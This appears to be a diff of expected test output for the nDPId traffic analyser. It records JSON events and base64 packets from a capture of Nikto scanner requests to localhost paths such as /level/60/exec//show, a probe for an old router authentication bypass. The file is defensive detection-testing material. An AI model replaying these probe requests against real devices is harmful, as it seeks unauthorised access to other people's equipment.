+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":607,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":607,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277662,"flow_last_seen":1576420277662,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50776,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/59\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001306)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_packet_id":1,"flow_last_seen":1576420277663,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277663,"pkt":"AAAAAAAAAAAAAAAACABFAADIGkpAAEAGIeR\/AAABfwAAAcZaH5C0PSNBlakojYAYAED+vAAAAQEICp1m\/sedZv7HR0VUIC9sZXZlbC82MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/60\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001307)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":608,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":608,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277663,"flow_last_seen":1576420277663,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277663,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50778,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/60\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001307)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_packet_id":1,"flow_last_seen":1576420277667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277667,"pkt":"AAAAAAAAAAAAAAAACABFAADIoR1AAEAGmxB\/AAABfwAAAcZcH5BUypgTdH6XP4AYAED+vAAAAQEICp1m\/sudZv7LR0VUIC9sZXZlbC82MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzA4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/61\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001308)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":609,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277667,"flow_last_seen":1576420277667,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50780,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/61\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001308)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_packet_id":1,"flow_last_seen":1576420277669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277669,"pkt":"AAAAAAAAAAAAAAAACABFAADI7qNAAEAGTYp\/AAABfwAAAcZeH5CzGNepEFgF6YAYAED+vAAAAQEICp1m\/s2dZv7NR0VUIC9sZXZlbC82Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMDkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/62\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001309)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":610,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":610,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277669,"flow_last_seen":1576420277669,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50782,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/62\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001309)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_packet_id":1,"flow_last_seen":1576420277670,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277670,"pkt":"AAAAAAAAAAAAAAAACABFAADI1RxAAEAGZxF\/AAABfwAAAcZgH5DKr+wUPhtD5IAYAED+vAAAAQEICp1m\/s6dZv7OR0VUIC9sZXZlbC82My9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/63\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001310)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":611,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277670,"flow_last_seen":1576420277670,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277670,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50784,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/63\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001310)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_packet_id":1,"flow_last_seen":1576420277675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277675,"pkt":"AAAAAAAAAAAAAAAACABFAADI4N9AAEAGW05\/AAABfwAAAcZiH5DpddnYHCFGp4AYAED+vAAAAQEICp1m\/tOdZv7SR0VUIC9sZXZlbC82NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMTEpDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/64\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001311)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":612,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277675,"flow_last_seen":1576420277675,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50786,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/64\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001311)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_packet_id":1,"flow_last_seen":1576420277677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277677,"pkt":"AAAAAAAAAAAAAAAACABFAADIG8lAAEAGIGV\/AAABfwAAAcZkH5CYBSLNt2luhoAYAED+vAAAAQEICp1m\/tWdZv7VR0VUIC9sZXZlbC82NS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/65\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001312)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":613,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":613,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277677,"flow_last_seen":1576420277677,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50788,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/65\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001312)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_packet_id":1,"flow_last_seen":1576420277678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277678,"pkt":"AAAAAAAAAAAAAAAACABFAADIttNAAEAGhVp\/AAABfwAAAcZmH5DUdY\/bkd0KuYAYAED+vAAAAQEICp1m\/tadZv7WR0VUIC9sZXZlbC82Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzEzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/66\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001313)"}}
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":614,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":614,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277678,"flow_last_seen":1576420277678,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277678,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50790,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/66\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001313)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_packet_id":1,"flow_last_seen":1576420277680,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420277680,"pkt":"AAAAAAAAAAAAAAAACABFAADI\/OVAAEAGP0h\/AAABfwAAAcZoH5ACKMXwYFGAmIAYAED+vAAAAQEICp1m\/tidZv7YR0VUIC9sZXZlbC82Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzE0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":615,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":615,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277680,"flow_last_seen":1576420277680,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420277680,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50792,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/67\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001314)"}}
